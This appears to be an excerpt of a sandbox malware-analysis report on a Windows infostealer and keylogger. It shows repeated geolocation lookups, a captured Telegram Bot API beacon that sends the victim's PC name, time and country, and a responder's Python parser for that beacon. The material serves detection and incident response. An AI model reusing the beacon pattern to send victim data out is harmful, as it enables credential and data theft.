2025-01-10 14:33:58 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49765 | 104.21.32.1 | 443 | 6572 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:34:00 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 14:34:00 UTC | 851 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 14:34:00 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1834429
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E3l1a0wH5KYOd6D6ln9UhOHhEgGZt49xTmKcUbYdWMyyjVjfr3DyJMewPI%2Ftb8UbSSSin7hXWQDtsyImRpoTcJC1DunFli3Qy4vsdrEYftL0ucUP3LFR6XbqT32YChi3G9cVKDfB"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffd62a6d8bf8cda-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1788&rtt_var=687&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1573275&cwnd=243&unsent_bytes=0&cid=a1ce720cf59acee2&ts=157&x=0"
2025-01-10 14:34:00 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49776 | 104.21.32.1 | 443 | 6572 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:34:01 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 14:34:01 UTC | 853 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 14:34:01 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1834430
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dPraCJWA3dOWBQV%2Fu8eHMD1Op5TGrjk0mrMreFNKJERzmThHmDMPLofOaVQ3huBsJjX7VwPWysS4b7iyDY4mFZ0W7Ai3xjfGLPWRIdwKA2ajuK0wkIH2R81aKjNVVinj%2Fon20oHm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffd62aecf1e1875-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1623&rtt_var=614&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1773997&cwnd=153&unsent_bytes=0&cid=663bbb7fa543a299&ts=131&x=0"
2025-01-10 14:34:01 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49784 | 104.21.32.1 | 443 | 6572 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:34:02 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 14:34:02 UTC | 859 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 14:34:02 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1834431
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0rFFaUZMdtVy2KAlac7Qm1UWnhf%2FRAgaH11jpED8OyJveD7FglhSK%2FHQSzRyyIf3gbRun7WWrvMXeZo7%2B1fyBX2YFQ404YfyGEo4taRfg%2BnwHdGcGiUioT7lNzzTj64hdwj%2FFxoS"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffd62b6f8d68cda-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1788&rtt_var=676&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1613259&cwnd=243&unsent_bytes=0&cid=5b32bbf776db286f&ts=144&x=0"
2025-01-10 14:34:02 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49795 | 104.21.32.1 | 443 | 6572 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:34:03 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 14:34:04 UTC | 855 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 14:34:04 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1834433
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9mJ4RiLbSr8mI6wKTuXMvv4m6%2BzrYbJuZN9igpXg26AS51VvfrgfRocMB0SFKHOMJg%2BOAJDrKBj1Kwct6Joglp%2FVa1I91ej6zCXKFVeWf3kQur3LYIDGQVXzKhtrQXJD1nrZgIO"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffd62bf580141a6-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1595&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1792510&cwnd=241&unsent_bytes=0&cid=8a7332d7c85af7ba&ts=163&x=0"
2025-01-10 14:34:04 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49806 | 104.21.32.1 | 443 | 6572 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:34:05 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 14:34:05 UTC | 851 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 14:34:05 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1834434
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7AHEAcRk0yJFIk0M3gM8nEa08m72QKF4hmNSTF91SqhaH8YFDpCqWa60DyfYgpL3nVWe5WNs5oXjTQB7igTWE4%2B5s7fKzqCnUiKdcXBcFaBCkb7Us6Ius9KDP85B7TBr2rDP6S1n"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffd62c778b08cda-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1862&min_rtt=1859&rtt_var=703&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1550716&cwnd=243&unsent_bytes=0&cid=a7b6c95f52175460&ts=152&x=0"
2025-01-10 14:34:05 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID:19
Source IP:192.168.2.5
Source Port:49812
Destination IP:149.154.167.220
Destination Port:443
PID:6572
Process:C:\Windows\SysWOW64\svchost.exe

Timestamp:2025-01-10 14:34:06 UTC
Bytes transferred:349
Direction:OUT
Data:
GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Timestamp:2025-01-10 14:34:06 UTC
Bytes transferred:344
Direction:IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 14:34:06 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Timestamp:2025-01-10 14:34:06 UTC
Bytes transferred:55
Direction:IN
Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}
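The stream above is the keylogger's first beacon to the Telegram Bot API, and it is worth pulling apart rather than reading raw: the path segment after /bot is where the bot token belongs and it is empty, chat_id is empty too, and Telegram answers 404 Not Found with {"ok":false,...} for an unknown or missing token. So the victim's hostname, local time and geolocated country were assembled and sent, but delivered to nobody. The following is an added example written for this page, not Joe Sandbox code and not code from the sample; the request line and the raw response bytes are copied verbatim from the stream, while the function names and the rule that splits the message body into "Key: value" lines are my own assumptions about the format.

```python
# Added example (not part of the Joe Sandbox report): parse the Telegram Bot API
# beacon captured above. REQUEST_LINE and RESPONSE_HEX are copied from the
# stream; function names and the field-splitting rules are my own.
import json
import re
from urllib.parse import parse_qs, urlsplit

REQUEST_LINE = (
    "GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0A"
    "Date%20and%20Time:%2010/01/2025%20/%2021:38:51%0D%0ACountry%20Name:%20"
    "United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you"
    "%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D"
    " HTTP/1.1"
)
RESPONSE_HEX = (
    "7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a "
    "34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f "
    "75 6e 64 22 7d"
)

# Bot API paths are /bot<token>/<method>; real tokens look like 123456:ABC-... ,
# so anything up to the next slash is taken as the token (possibly empty).
BOT_PATH = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>[A-Za-z]+)$")


def parse_beacon(request_line: str) -> dict:
    """Split a sendMessage request into token, chat_id and the CRLF-separated
    'Key: value' lines the keylogger packs into the `text` parameter."""
    http_method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    m = BOT_PATH.match(parts.path)
    if not m:
        raise ValueError("not a Telegram bot API path: %s" % parts.path)
    # keep_blank_values so an empty chat_id= is still reported as present.
    qs = parse_qs(parts.query, keep_blank_values=True)
    text = qs.get("text", [""])[0]          # parse_qs already percent-decodes
    fields, free_text = {}, []
    for line in text.split("\r\n"):
        if line.startswith("["):             # the bracketed status sentence
            free_text.append(line)
        elif ":" in line:                    # split on the FIRST colon only,
            key, value = line.split(":", 1)  # the timestamp contains more
            fields[key.strip()] = value.strip()
    return {
        "http_method": http_method,
        "api_method": m.group("method"),
        "bot_token": m.group("token"),
        "chat_id": qs.get("chat_id", [""])[0],
        "fields": fields,
        "free_text": free_text,
    }


def decode_response(hex_dump: str) -> dict:
    """Turn the 'Data Raw' hex line back into the JSON object Telegram sent."""
    body = bytes.fromhex(hex_dump.replace(" ", ""))
    return json.loads(body.decode("utf-8"))


def explain_outcome(beacon: dict, reply: dict) -> str:
    """Was anything exfiltrated? Telegram answers 404 for a missing or unknown
    bot token, which is exactly what an empty /bot/ segment produces."""
    if not beacon["bot_token"]:
        return "no bot token in path; Telegram answered 404 and nothing was delivered"
    if reply.get("ok"):
        return "delivered to chat_id %s" % (beacon["chat_id"] or "<empty>")
    return "rejected: %s (%s)" % (reply.get("description"), reply.get("error_code"))


if __name__ == "__main__":
    b = parse_beacon(REQUEST_LINE)
    r = decode_response(RESPONSE_HEX)
    print(json.dumps(b, indent=2))
    print(explain_outcome(b, r))
```

The same parser applies to later sendDocument or sendMessage beacons from this family once a real token is present; the token captured in the path is then the single most useful indicator to extract, because it lets a responder query getMe and getUpdates on the attacker's bot and, if the operator never rotates it, identify every other victim posting into the same chat.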


                                                                                                                Target ID:0
                                                                                                                Start time:09:33:36
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Users\user\Desktop\B7N48hmO78.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\B7N48hmO78.exe"
                                                                                                                Imagebase:0xde0000
                                                                                                                File size:649'216 bytes
                                                                                                                MD5 hash:80A64F0B8DF55D637E135F0EB4FB6B70
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:09:33:37
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Users\user\AppData\Local\inhumate\demonetised.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\B7N48hmO78.exe"
                                                                                                                Imagebase:0xd20000
                                                                                                                File size:649'216 bytes
                                                                                                                MD5 hash:80A64F0B8DF55D637E135F0EB4FB6B70
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.2089442641.0000000001290000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 79%, ReversingLabs
                                                                                                                • Detection: 73%, Virustotal, Browse
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:09:33:39
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\B7N48hmO78.exe"
                                                                                                                Imagebase:0x930000
                                                                                                                File size:46'504 bytes
                                                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.4522422465.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                Reputation:high
